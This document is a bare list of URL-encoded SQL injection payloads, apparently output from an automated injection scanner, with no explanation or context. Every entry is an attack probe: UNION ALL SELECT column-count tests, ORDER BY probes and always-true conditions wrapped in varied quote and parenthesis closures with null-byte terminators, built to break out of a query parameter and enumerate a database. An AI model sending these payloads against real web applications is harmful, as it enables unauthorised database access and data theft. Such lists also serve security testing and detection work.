1%27%20%2B%20%28SELECT%20%27eBCp%27%20FROM%20DUAL%20WHERE%203663%3D3663%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27sImG%27%20FROM%20DUAL%20WHERE%205424%3D5424%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VCFi%27%20FROM%20DUAL%20WHERE%206871%3D6871%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27wrQY%27%20FROM%20DUAL%20WHERE%202557%3D2557%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kYcU%27%20FROM%20DUAL%20WHERE%201873%3D1873%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27swsz%27%20FROM%20DUAL%20WHERE%202161%3D2161%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27swhk%27%20FROM%20DUAL%20WHERE%202285%3D2285%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27DzVG%27%20WHERE%204764%3D4764%20ORDER%20BY%201%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27GQrw%27%20WHERE%203849%3D3849%20ORDER%20BY%209508%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27BBZr%27%20WHERE%207722%3D7722%20UNION%20ALL%20SELECT%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vjKY%27%20WHERE%207865%3D7865%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qJeI%27%20WHERE%207798%3D7798%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27IIjw%27%20WHERE%206424%3D6424%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27roMF%27%20WHERE%202985%3D2985%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27FbaG%27%20WHERE%205085%3D5085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27mtOY%27%20WHERE%206205%3D6205%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27sPdA%27%20WHERE%207467%3D7467%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kncP%27%20WHERE%208648%3D8648%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Irpd%27%20WHERE%201918%3D1918%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%201%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20ORDER%20BY%209183%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%00%20%23 -2042%29%20ORDER%20BY%201%00 -2229%29%20ORDER%20BY%205695%00 -6790%29%20UNION%20ALL%20SELECT%205073%00 -7145%29%20UNION%20ALL%20SELECT%205877%2C%205877%00 -5972%29%20UNION%20ALL%20SELECT%204985%2C%204985%2C%204985%00 -5406%29%20UNION%20ALL%20SELECT%203355%2C%203355%2C%203355%2C%203355%00 -4959%29%20UNION%20ALL%20SELECT%202212%2C%202212%2C%202212%2C%202212%2C%202212%00 -6280%29%20UNION%20ALL%20SELECT%205310%2C%205310%2C%205310%2C%205310%2C%205310%2C%205310%00 -7559%29%20UNION%20ALL%20SELECT%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%2C%206288%00 -2192%29%20UNION%20ALL%20SELECT%208639%2C%208639%2C%208639%2C%208639%2C%208639%2C%208639%2C%208639%2C%208639%00 -2235%29%20UNION%20ALL%20SELECT%204611%2C%204611%2C%204611%2C%204611%2C%204611%2C%204611%2C%204611%2C%204611%2C%204611%00 -5300%29%20UNION%20ALL%20SELECT%202774%2C%202774%2C%202774%2C%202774%2C%202774%2C%202774%2C%202774%2C%202774%2C%202774%2C%202774%00 -2358%27%29%20ORDER%20BY%201%00 -9575%27%29%20ORDER%20BY%202539%00 -8615%27%29%20UNION%20ALL%20SELECT%202595%00 -5897%27%29%20UNION%20ALL%20SELECT%201954%2C%201954%00 -9162%27%29%20UNION%20ALL%20SELECT%207269%2C%207269%2C%207269%00 -4347%27%29%20UNION%20ALL%20SELECT%205963%2C%205963%2C%205963%2C%205963%00 -9227%27%29%20UNION%20ALL%20SELECT%207808%2C%207808%2C%207808%2C%207808%2C%207808%00 -9157%27%29%20UNION%20ALL%20SELECT%202276%2C%202276%2C%202276%2C%202276%2C%202276%2C%202276%00 -8210%27%29%20UNION%20ALL%20SELECT%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%2C%201288%00 -5115%27%29%20UNION%20ALL%20SELECT%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%2C%208260%00 -9251%27%29%20UNION%20ALL%20SELECT%201269%2C%201269%2C%201269%2C%201269%2C%201269%2C%201269%2C%201269%2C%201269%2C%201269%00 -4641%27%29%20UNION%20ALL%20SELECT%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%2C%201232%00 -2311%27%20ORDER%20BY%201%00 -5287%27%20ORDER%20BY%203685%00 -5835%27%20UNION%20ALL%20SELECT%204980%00 -9647%27%20UNION%20ALL%20SELECT%203988%2C%203988%00 -2491%27%20UNION%20ALL%20SELECT%205951%2C%205951%2C%205951%00 -2752%27%20UNION%20ALL%20SELECT%205286%2C%205286%2C%205286%2C%205286%00 -4218%27%20UNION%20ALL%20SELECT%202000%2C%202000%2C%202000%2C%202000%2C%202000%00 -2575%27%20UNION%20ALL%20SELECT%206361%2C%206361%2C%206361%2C%206361%2C%206361%2C%206361%00 -8201%27%20UNION%20ALL%20SELECT%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%00 -6367%27%20UNION%20ALL%20SELECT%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%2C%209418%00 -9031%27%20UNION%20ALL%20SELECT%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%2C%208332%00 -9824%27%20UNION%20ALL%20SELECT%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%2C%209000%00 -9019%22%20ORDER%20BY%201%00 -6509%22%20ORDER%20BY%203669%00 -3878%22%20UNION%20ALL%20SELECT%209028%00 -2144%22%20UNION%20ALL%20SELECT%201617%2C%201617%00 -8404%22%20UNION%20ALL%20SELECT%205868%2C%205868%2C%205868%00 -4021%22%20UNION%20ALL%20SELECT%202136%2C%202136%2C%202136%2C%202136%00 -9856%22%20UNION%20ALL%20SELECT%208184%2C%208184%2C%208184%2C%208184%2C%208184%00 -4469%22%20UNION%20ALL%20SELECT%209581%2C%209581%2C%209581%2C%209581%2C%209581%2C%209581%00 -7239%22%20UNION%20ALL%20SELECT%208608%2C%208608%2C%208608%2C%208608%2C%208608%2C%208608%2C%208608%00 -3098%22%20UNION%20ALL%20SELECT%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%2C%205076%00 -9805%22%20UNION%20ALL%20SELECT%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%2C%201484%00 -6271%22%20UNION%20ALL%20SELECT%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%2C%208261%00 -3595%29%20ORDER%20BY%201%00%20AND%20%281254%3D1254 -8492%29%20ORDER%20BY%207894%00%20AND%20%287738%3D7738 -6707%29%20UNION%20ALL%20SELECT%202106%00%20AND%20%287840%3D7840 -6866%29%20UNION%20ALL%20SELECT%201008%2C%201008%00%20AND%20%284520%3D4520 -8437%29%20UNION%20ALL%20SELECT%203008%2C%203008%2C%203008%00%20AND%20%288192%3D8192 -9381%29%20UNION%20ALL%20SELECT%208030%2C%208030%2C%208030%2C%208030%00%20AND%20%283323%3D3323 -6311%29%20UNION%20ALL%20SELECT%205579%2C%205579%2C%205579%2C%205579%2C%205579%00%20AND%20%286086%3D6086 -8991%29%20UNION%20ALL%20SELECT%206460%2C%206460%2C%206460%2C%206460%2C%206460%2C%206460%00%20AND%20%285337%3D5337 -8229%29%20UNION%20ALL%20SELECT%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%2C%205253%00%20AND%20%284808%3D4808 -6768%29%20UNION%20ALL%20SELECT%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%2C%204190%00%20AND%20%285015%3D5015 -6683%29%20UNION%20ALL%20SELECT%201116%2C%201116%2C%201116%2C%201116%2C%201116%2C%201116%2C%201116%2C%201116%2C%201116%00%20AND%20%281146%3D1146 -5495%29%20UNION%20ALL%20SELECT%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%2C%202008%00%20AND%20%288714%3D8714 -2677%29%29%20ORDER%20BY%201%00%20AND%20%28%281854%3D1854 -3018%29%29%20ORDER%20BY%204445%00%20AND%20%28%289199%3D9199 -1437%29%29%20UNION%20ALL%20SELECT%207417%00%20AND%20%28%282341%3D2341 -7246%29%29%20UNION%20ALL%20SELECT%208793%2C%208793%00%20AND%20%28%286471%3D6471 -4260%29%29%20UNION%20ALL%20SELECT%204537%2C%204537%2C%204537%00%20AND%20%28%288150%3D8150 -5702%29%29%20UNION%20ALL%20SELECT%203485%2C%203485%2C%203485%2C%203485%00%20AND%20%28%288689%3D8689 -9312%29%29%20UNION%20ALL%20SELECT%207208%2C%207208%2C%207208%2C%207208%2C%207208%00%20AND%20%28%287681%3D7681 -7706%29%29%20UNION%20ALL%20SELECT%202486%2C%202486%2C%202486%2C%202486%2C%202486%2C%202486%00%20AND%20%28%287148%3D7148 -3025%29%29%20UNION%20ALL%20SELECT%209857%2C%209857%2C%209857%2C%209857%2C%209857%2C%209857%2C%209857%00%20AND%20%28%282353%3D2353 -5849%29%29%20UNION%20ALL%20SELECT%207949%2C%207949%2C%207949%2C%207949%2C%207949%2C%207949%2C%207949%2C%207949%00%20AND%20%28%286772%3D6772 -1178%29%29%20UNION%20ALL%20SELECT%208574%2C%208574%2C%208574%2C%208574%2C%208574%2C%208574%2C%208574%2C%208574%2C%208574%00%20AND%20%28%285430%3D5430 -9486%29%29%20UNION%20ALL%20SELECT%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%2C%209933%00%20AND%20%28%281205%3D1205 -5357%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%281919%3D1919 -9522%29%29%29%20ORDER%20BY%203040%00%20AND%20%28%28%281777%3D1777 -5211%29%29%29%20UNION%20ALL%20SELECT%208160%00%20AND%20%28%28%284885%3D4885 -4606%29%29%29%20UNION%20ALL%20SELECT%207849%2C%207849%00%20AND%20%28%28%288554%3D8554 -2041%29%29%29%20UNION%20ALL%20SELECT%202622%2C%202622%2C%202622%00%20AND%20%28%28%281105%3D1105 -6981%29%29%29%20UNION%20ALL%20SELECT%203028%2C%203028%2C%203028%2C%203028%00%20AND%20%28%28%283487%3D3487 -7690%29%29%29%20UNION%20ALL%20SELECT%209108%2C%209108%2C%209108%2C%209108%2C%209108%00%20AND%20%28%28%283360%3D3360 -8563%29%29%29%20UNION%20ALL%20SELECT%202610%2C%202610%2C%202610%2C%202610%2C%202610%2C%202610%00%20AND%20%28%28%288851%3D8851 -3041%29%29%29%20UNION%20ALL%20SELECT%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%2C%205331%00%20AND%20%28%28%285935%3D5935 -4155%29%29%29%20UNION%20ALL%20SELECT%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%2C%203681%00%20AND%20%28%28%282452%3D2452 -1324%29%29%29%20UNION%20ALL%20SELECT%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%2C%207195%00%20AND%20%28%28%288489%3D8489 -2893%29%29%29%20UNION%20ALL%20SELECT%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%2C%209433%00%20AND%20%28%28%289112%3D9112 -6704%20ORDER%20BY%201%00 -1481%20ORDER%20BY%201609%00 -4543%20UNION%20ALL%20SELECT%201284%00 -4471%20UNION%20ALL%20SELECT%208259%2C%208259%00 -8805%20UNION%20ALL%20SELECT%204475%2C%204475%2C%204475%00 -6041%20UNION%20ALL%20SELECT%206873%2C%206873%2C%206873%2C%206873%00 -2644%20UNION%20ALL%20SELECT%207287%2C%207287%2C%207287%2C%207287%2C%207287%00 -4496%20UNION%20ALL%20SELECT%209558%2C%209558%2C%209558%2C%209558%2C%209558%2C%209558%00 -8111%20UNION%20ALL%20SELECT%204297%2C%204297%2C%204297%2C%204297%2C%204297%2C%204297%2C%204297%00 -4984%20UNION%20ALL%20SELECT%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%2C%208647%00 -2665%20UNION%20ALL%20SELECT%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%2C%209458%00 -9144%20UNION%20ALL%20SELECT%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%2C%201601%00 -9923%27%29%20ORDER%20BY%201%00%20AND%20%28%27IPEL%27%3D%27IPEL -2129%27%29%20ORDER%20BY%206695%00%20AND%20%28%27dGoh%27%3D%27dGoh -2115%27%29%20UNION%20ALL%20SELECT%204187%00%20AND%20%28%27kIvu%27%3D%27kIvu -4764%27%29%20UNION%20ALL%20SELECT%208066%2C%208066%00%20AND%20%28%27jNPO%27%3D%27jNPO -4114%27%29%20UNION%20ALL%20SELECT%207568%2C%207568%2C%207568%00%20AND%20%28%27IjaQ%27%3D%27IjaQ -9019%27%29%20UNION%20ALL%20SELECT%204927%2C%204927%2C%204927%2C%204927%00%20AND%20%28%27Mwwn%27%3D%27Mwwn -5982%27%29%20UNION%20ALL%20SELECT%207263%2C%207263%2C%207263%2C%207263%2C%207263%00%20AND%20%28%27Emub%27%3D%27Emub -2935%27%29%20UNION%20ALL%20SELECT%207636%2C%207636%2C%207636%2C%207636%2C%207636%2C%207636%00%20AND%20%28%27Ftxk%27%3D%27Ftxk -8925%27%29%20UNION%20ALL%20SELECT%205789%2C%205789%2C%205789%2C%205789%2C%205789%2C%205789%2C%205789%00%20AND%20%28%27yIlT%27%3D%27yIlT -6397%27%29%20UNION%20ALL%20SELECT%203725%2C%203725%2C%203725%2C%203725%2C%203725%2C%203725%2C%203725%2C%203725%00%20AND%20%28%27wfjy%27%3D%27wfjy -6375%27%29%20UNION%20ALL%20SELECT%209224%2C%209224%2C%209224%2C%209224%2C%209224%2C%209224%2C%209224%2C%209224%2C%209224%00%20AND%20%28%27nJAI%27%3D%27nJAI -6389%27%29%20UNION%20ALL%20SELECT%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%2C%203435%00%20AND%20%28%27LVqJ%27%3D%27LVqJ -5983%27%29%29%20ORDER%20BY%201%00%20AND%20%28%28%27qDux%27%3D%27qDux -1317%27%29%29%20ORDER%20BY%205619%00%20AND%20%28%28%27QRmx%27%3D%27QRmx -7841%27%29%29%20UNION%20ALL%20SELECT%208164%00%20AND%20%28%28%27xBmz%27%3D%27xBmz -6471%27%29%29%20UNION%20ALL%20SELECT%207490%2C%207490%00%20AND%20%28%28%27hwBO%27%3D%27hwBO -6782%27%29%29%20UNION%20ALL%20SELECT%207599%2C%207599%2C%207599%00%20AND%20%28%28%27dYMW%27%3D%27dYMW -1097%27%29%29%20UNION%20ALL%20SELECT%203590%2C%203590%2C%203590%2C%203590%00%20AND%20%28%28%27RLeu%27%3D%27RLeu -6934%27%29%29%20UNION%20ALL%20SELECT%202854%2C%202854%2C%202854%2C%202854%2C%202854%00%20AND%20%28%28%27RfSJ%27%3D%27RfSJ -3855%27%29%29%20UNION%20ALL%20SELECT%206081%2C%206081%2C%206081%2C%206081%2C%206081%2C%206081%00%20AND%20%28%28%27DDQm%27%3D%27DDQm -1407%27%29%29%20UNION%20ALL%20SELECT%207217%2C%207217%2C%207217%2C%207217%2C%207217%2C%207217%2C%207217%00%20AND%20%28%28%27YwjM%27%3D%27YwjM -9483%27%29%29%20UNION%20ALL%20SELECT%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%2C%206936%00%20AND%20%28%28%27bJqZ%27%3D%27bJqZ -9308%27%29%29%20UNION%20ALL%20SELECT%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%2C%201911%00%20AND%20%28%28%27QWUC%27%3D%27QWUC -1167%27%29%29%20UNION%20ALL%20SELECT%204589%2C%204589%2C%204589%2C%204589%2C%204589%2C%204589%2C%204589%2C%204589%2C%204589%2C%204589%00%20AND%20%28%28%27zUNS%27%3D%27zUNS -7494%27%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%27wzEh%27%3D%27wzEh -6452%27%29%29%29%20ORDER%20BY%206891%00%20AND%20%28%28%28%27JRCe%27%3D%27JRCe -7767%27%29%29%29%20UNION%20ALL%20SELECT%208760%00%20AND%20%28%28%28%27XBBM%27%3D%27XBBM -5861%27%29%29%29%20UNION%20ALL%20SELECT%207416%2C%207416%00%20AND%20%28%28%28%27bNcY%27%3D%27bNcY -1449%27%29%29%29%20UNION%20ALL%20SELECT%208928%2C%208928%2C%208928%00%20AND%20%28%28%28%27SoWG%27%3D%27SoWG -1386%27%29%29%29%20UNION%20ALL%20SELECT%207341%2C%207341%2C%207341%2C%207341%00%20AND%20%28%28%28%27IjEK%27%3D%27IjEK -8345%27%29%29%29%20UNION%20ALL%20SELECT%204503%2C%204503%2C%204503%2C%204503%2C%204503%00%20AND%20%28%28%28%27egrD%27%3D%27egrD -7960%27%29%29%29%20UNION%20ALL%20SELECT%205414%2C%205414%2C%205414%2C%205414%2C%205414%2C%205414%00%20AND%20%28%28%28%27KYes%27%3D%27KYes -7826%27%29%29%29%20UNION%20ALL%20SELECT%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%2C%201929%00%20AND%20%28%28%28%27yIus%27%3D%27yIus -5583%27%29%29%29%20UNION%20ALL%20SELECT%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%2C%203403%00%20AND%20%28%28%28%27ZOxd%27%3D%27ZOxd -1702%27%29%29%29%20UNION%20ALL%20SELECT%206912%2C%206912%2C%206912%2C%206912%2C%206912%2C%206912%2C%206912%2C%206912%2C%206912%00%20AND%20%28%28%28%27IBkc%27%3D%27IBkc -7887%27%29%29%29%20UNION%20ALL%20SELECT%204662%2C%204662%2C%204662%2C%204662%2C%204662%2C%204662%2C%204662%2C%204662%2C%204662%2C%204662%00%20AND%20%28%28%28%27xSaI%27%3D%27xSaI -7432%27%20ORDER%20BY%201%00%20AND%20%27oZIg%27%3D%27oZIg -6537%27%20ORDER%20BY%206844%00%20AND%20%27oEqn%27%3D%27oEqn -4793%27%20UNION%20ALL%20SELECT%206655%00%20AND%20%27PRMo%27%3D%27PRMo -2467%27%20UNION%20ALL%20SELECT%204884%2C%204884%00%20AND%20%27PusD%27%3D%27PusD -2356%27%20UNION%20ALL%20SELECT%202083%2C%202083%2C%202083%00%20AND%20%27mGnw%27%3D%27mGnw -5612%27%20UNION%20ALL%20SELECT%204981%2C%204981%2C%204981%2C%204981%00%20AND%20%27AjFR%27%3D%27AjFR -6697%27%20UNION%20ALL%20SELECT%207167%2C%207167%2C%207167%2C%207167%2C%207167%00%20AND%20%27wMet%27%3D%27wMet -6890%27%20UNION%20ALL%20SELECT%205229%2C%205229%2C%205229%2C%205229%2C%205229%2C%205229%00%20AND%20%27XSJJ%27%3D%27XSJJ -5526%27%20UNION%20ALL%20SELECT%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%2C%202359%00%20AND%20%27lkLa%27%3D%27lkLa -5783%27%20UNION%20ALL%20SELECT%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%2C%209686%00%20AND%20%27HMhp%27%3D%27HMhp -4779%27%20UNION%20ALL%20SELECT%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%2C%209989%00%20AND%20%27svsh%27%3D%27svsh -6405%27%20UNION%20ALL%20SELECT%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%2C%204367%00%20AND%20%27vOWZ%27%3D%27vOWZ -5453%27%29%20ORDER%20BY%201%00%20AND%20%28%27YPOH%27%20LIKE%20%27YPOH -9900%27%29%20ORDER%20BY%205021%00%20AND%20%28%27kNLe%27%20LIKE%20%27kNLe -8552%27%29%20UNION%20ALL%20SELECT%208867%00%20AND%20%28%27peQI%27%20LIKE%20%27peQI -8217%27%29%20UNION%20ALL%20SELECT%207816%2C%207816%00%20AND%20%28%27JqyX%27%20LIKE%20%27JqyX -6877%27%29%20UNION%20ALL%20SELECT%202857%2C%202857%2C%202857%00%20AND%20%28%27wbyl%27%20LIKE%20%27wbyl -6938%27%29%20UNION%20ALL%20SELECT%201983%2C%201983%2C%201983%2C%201983%00%20AND%20%28%27zAzj%27%20LIKE%20%27zAzj -4301%27%29%20UNION%20ALL%20SELECT%203750%2C%203750%2C%203750%2C%203750%2C%203750%00%20AND%20%28%27xaVJ%27%20LIKE%20%27xaVJ -1469%27%29%20UNION%20ALL%20SELECT%209965%2C%209965%2C%209965%2C%209965%2C%209965%2C%209965%00%20AND%20%28%27VByn%27%20LIKE%20%27VByn -9363%27%29%20UNION%20ALL%20SELECT%203929%2C%203929%2C%203929%2C%203929%2C%203929%2C%203929%2C%203929%00%20AND%20%28%27XJbg%27%20LIKE%20%27XJbg -5191%27%29%20UNION%20ALL%20SELECT%203316%2C%203316%2C%203316%2C%203316%2C%203316%2C%203316%2C%203316%2C%203316%00%20AND%20%28%27eiQg%27%20LIKE%20%27eiQg -4363%27%29%20UNION%20ALL%20SELECT%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%2C%204292%00%20AND%20%28%27UYvJ%27%20LIKE%20%27UYvJ -1617%27%29%20UNION%20ALL%20SELECT%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%2C%203206%00%20AND%20%28%27Zzqc%27%20LIKE%20%27Zzqc -1128%27%29%29%20ORDER%20BY%201%00%20AND%20%28%28%27yASe%27%20LIKE%20%27yASe -8441%27%29%29%20ORDER%20BY%203682%00%20AND%20%28%28%27EeDZ%27%20LIKE%20%27EeDZ -4026%27%29%29%20UNION%20ALL%20SELECT%205409%00%20AND%20%28%28%27RBjB%27%20LIKE%20%27RBjB -3490%27%29%29%20UNION%20ALL%20SELECT%202361%2C%202361%00%20AND%20%28%28%27AYeM%27%20LIKE%20%27AYeM -2206%27%29%29%20UNION%20ALL%20SELECT%205857%2C%205857%2C%205857%00%20AND%20%28%28%27IvuY%27%20LIKE%20%27IvuY -2472%27%29%29%20UNION%20ALL%20SELECT%204583%2C%204583%2C%204583%2C%204583%00%20AND%20%28%28%27WVrQ%27%20LIKE%20%27WVrQ -3625%27%29%29%20UNION%20ALL%20SELECT%203440%2C%203440%2C%203440%2C%203440%2C%203440%00%20AND%20%28%28%27vTzN%27%20LIKE%20%27vTzN -6168%27%29%29%20UNION%20ALL%20SELECT%209060%2C%209060%2C%209060%2C%209060%2C%209060%2C%209060%00%20AND%20%28%28%27AsUk%27%20LIKE%20%27AsUk -8721%27%29%29%20UNION%20ALL%20SELECT%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%2C%203377%00%20AND%20%28%28%27iGPA%27%20LIKE%20%27iGPA -8795%27%29%29%20UNION%20ALL%20SELECT%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%2C%201830%00%20AND%20%28%28%27yVVs%27%20LIKE%20%27yVVs -4797%27%29%29%20UNION%20ALL%20SELECT%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%2C%206938%00%20AND%20%28%28%27aiOQ%27%20LIKE%20%27aiOQ -7209%27%29%29%20UNION%20ALL%20SELECT%202138%2C%202138%2C%202138%2C%202138%2C%202138%2C%202138%2C%202138%2C%202138%2C%202138%2C%202138%00%20AND%20%28%28%27rVgj%27%20LIKE%20%27rVgj -7579%27%29%29%29%20ORDER%20BY%201%00%20AND%20%28%28%28%27HJYl%27%20LIKE%20%27HJYl -1802%27%29%29%29%20ORDER%20BY%207688%00%20AND%20%28%28%28%27Fvmj%27%20LIKE%20%27Fvmj -1148%27%29%29%29%20UNION%20ALL%20SELECT%204163%00%20AND%20%28%28%28%27ZCke%27%20LIKE%20%27ZCke -3710%27%29%29%29%20UNION%20ALL%20SELECT%202326%2C%202326%00%20AND%20%28%28%28%27jnAB%27%20LIKE%20%27jnAB -8937%27%29%29%29%20UNION%20ALL%20SELECT%205542%2C%205542%2C%205542%00%20AND%20%28%28%28%27sJcd%27%20LIKE%20%27sJcd -4719%27%29%29%29%20UNION%20ALL%20SELECT%207478%2C%207478%2C%207478%2C%207478%00%20AND%20%28%28%28%27OOou%27%20LIKE%20%27OOou -6744%27%29%29%29%20UNION%20ALL%20SELECT%208698%2C%208698%2C%208698%2C%208698%2C%208698%00%20AND%20%28%28%28%27yAlD%27%20LIKE%20%27yAlD -2014%27%29%29%29%20UNION%20ALL%20SELECT%204814%2C%204814%2C%204814%2C%204814%2C%204814%2C%204814%00%20AND%20%28%28%28%27SRVA%27%20LIKE%20%27SRVA -9273%27%29%29%29%20UNION%20ALL%20SELECT%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%2C%209849%00%20AND%20%28%28%28%27pWsV%27%20LIKE%20%27pWsV -5804%27%29%29%29%20UNION%20ALL%20SELECT%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%2C%205947%00%20AND%20%28%28%28%27mEEm%27%20LIKE%20%27mEEm 